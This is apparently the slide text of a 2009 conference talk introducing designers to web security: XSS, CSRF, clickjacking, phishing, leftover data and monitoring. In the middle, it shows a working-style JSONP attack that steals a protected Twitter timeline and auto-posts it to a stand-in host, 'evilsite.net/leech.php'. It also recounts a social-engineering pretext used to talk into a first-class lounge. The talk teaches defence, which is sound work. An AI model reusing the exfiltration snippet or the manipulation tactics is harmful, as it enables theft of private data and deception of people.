Things that go bump
on the web
Christian Heilmann | http://wait-till-i.com | http://scriptingenabled.org
Web Directions North, Denver, Colorado, February 2009

Disclaimer:
The following is a personal presentation
and the views do not necessarily reflect
those of my employer or the conference
organizer!
There will be strong language, public
exposure (of security issues) and some
strong opinions.
Viewer discretion is advised.

Hello, I am Chris.

I’m here today to talk to you
about web application
security.

I’ve seen several security
presentations myself.

And they fall into a few
categories:

Technical mumbo jumbo that
leaves you feeling
inadequate and scared.

“Neener Neener, look what I
can hack” show-offs.

“Use our systems or you’ll be
dead tomorrow.” sales
pitches.

I wanted to avoid anything
like that.

My intention is not to leave
you feeling patronised...

...confused
or scared.

I want to point out several
basics of web security...

...and offer some ideas of how
you can prevent the worst
and help us make the web
safer.

Here’s what I will go through:
Close the gates.
Clean up your mess.
Don’t breed idiots. d
sore
cen
Stay up-to-date.
Constant Vigilance, Harry!

Close the Gates!

Here’s a quick roundup of
attack technologies and
methodologies you should
know about.

XSS!

https://www.owasp.org/index.php?
title=XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

XSS means that people can
successfully inject something
into your sites that shouldn’t
be there.

Successfully injecting
JavaScript in your site allows
me to steal and fake the
identity of your users or
yourself.

SQL
Injection

Always filter SQL statements
from your requests!

CSRF!

http://en.wikipedia.org/wiki/Cross-
site_request_forgery

CSRF happens when you have
predictable urls to initiate
actions – like deleting a form
post or transferring money.

This url could then be called
in the background from
another site – via an image or
a form submission in
JavaScript.

Clickjacking

http://ha.ckers.org/blog/20080915/clickjacking/

Clickjacking is a trick to cover
a real interface in an IFRAME
with a transparent GIF or
Flash movie...

...to send you to another site
or pretend there was a
problem and asking for you
to log in again.

Isn’t it interesting that the
verified by visa security tool
makes that look very normal?

Phishing!

Phishing means showing a
familiar interface and luring
users into entering data.

The only way to prevent this
is let the user choose a secret
only they know...

...like the Yahoo sign-in seal.

I approve
of this!

XBCR!

E!
K
A
F
http://en.wikipedia.org/wiki/Cross-boundary-
currency-request

Clean up your mess!

A lot of security problems
happen because people leave
data behind.

This can be in their HTML.

Comments are not a good
tool to turn off sections of the
page that shouldn’t be
available yet!

Or it can be in JavaScript...

Or on their server:

Or in their browsers.

I built TweetEffect.com, a
small tool to check your
twitter follower changes.

And then I got this email (not
real size, it had to be resized)

I checked the user name and
saw nothing – just a “this user
isn’t available”.

What happened?

Apparently this person was
logged in and of course that
way authenticated to see the
updates.

The same thing happens
when one of the friends of
that person is logged in!

So, this is interesting...

Step 1: Log in yourself

Step 2: Get his list of followers

Step 3: Set the trap

You can get a user’s updates
with a simple REST call:
http://twitter.com/statuses/
user_timeline/codepo8.xml?
count=200

<img src=”tuna_funny.jpg”
alt=”tee hee hee”>
<form method=”post”
action=”http://evilsite.net/
leech.php”>
<input type=”hidden” value=””
name=”muahaha”>
</form>

<script>
function evilgenius(o){
var m=document.getElementById(‘muahaha’);
m.value=o;
document.forms[0].submit();
}
</script>
<script src=”http://twitter.com/statuses/
user_timeline/tuna.json?
count=200&callback=evilgenius”></script>

...alternatively use Ajax...

Step 4: Contact random friend
of tuna to visit the site.

As they are authenticated the
data will be returned without
a question and sent to your
server.

Learnings:
Do not trust browsers, ever!
A lock on a screen does not mean
protection!
You are as protected as the people you
deal with.

Which brings me to the next
point...

DANGER!
I am now going to
be a bit daring.
I will ask you to
question common
ways of thinking
and considering
alternatives.

Don’t breed idiots!

I’m a designer,
why should I
care about web
application
security?

Designers help users do the
right things in the easiest and
most effective manner.

We have the chance to
increase usability to stop
people repeatedly shooting
themselves in the foot.

None
of this!

Users should be conditioned
not to trust blindly.

Yet we tell them to store their
information on computers
and give them an option to
stay logged in.

Getting information out of
people is easy:

Be confident, show (or fake)
authority, keep things
confusing and give them a
wrong sense of urgency.

“Look, your wireless is flaky, I am
in the middle of a phone conference
and it keeps dropping out. Is there
a wired connection in this lounge?”

“Do you have a first class ticket?”
“I just asked you where the wired
connection is, this is an urgent
conference and I need to answer
this now!”

= Chris had some hours in the
first class lounge!

Why did that work?

People are used to being
treated like this.

We also don’t tell users off for
using clever passwords like
“password” or “happiness”.

Don’t make your end users
suffer for your lack of
security.

CAPTCHAS solve nothing!
http://caca.zoy.org/wiki/PWNtcha

Here’s a challenge for you
design and marketing
wizards:

How about an interface that
makes it fun to change your
password every week?

And here’s a challenge for
security experts:

Use HUMAN language!

“confused deputy”

“man in the middle attack”

“the password antipattern”

How about
“giving your login and password for
one system to another system is like
writing your pin number on your
credit card and asking a stranger to
buy something for you!”

Stay
up to
date!

There is no security in sticking
with outdated systems.

Therefore make sure to keep
your server, your client
software and your operating
system up-to-date.

Even if companies offer a way
out not to “break the web”.

None
of this!

This also applies to your skills.

If you *don’t* want to be the
guardian against evil and
have *your butt on the line*
when things to bump...

...build with frameworks!

Symfony, Django, Rails all
offer out-of-the-box filtering
and sanitization.

If there is a vulnerability, it
can be fixed by a lot of people
and pushed out as an update.

Constant vigilance!
Screenshot from Harry Potter and the Goblet of fire, found on some blog but probably courtesy of Warner Brothers

The most important thing for
you is to constantly be aware
of what your servers are up
to.

This *does* include your blog
and portfolio!

Any server can be a spam hub
or part of an attack network.

Your friends are:
Server logs
Statistics software

Don’t just look at the numbers

More interesting are
“posted forms”

And “page query terms”

Keep up-to-date with what’s
happening in web security.

http://simonwillison.net/
tags/security/

Stay curious to poke at things
and find out their flaws and
report them!

THANKS!
Christian Heilmann
http://wait-till-i.com
http://scriptingenabled.org
http://twitter.com/codepo8
Images by icanhazcheeseburger.com, failblog.org,kqe.de and from the web.
Eye photo: http://flickr.com/photos/jaredmoo/2113943480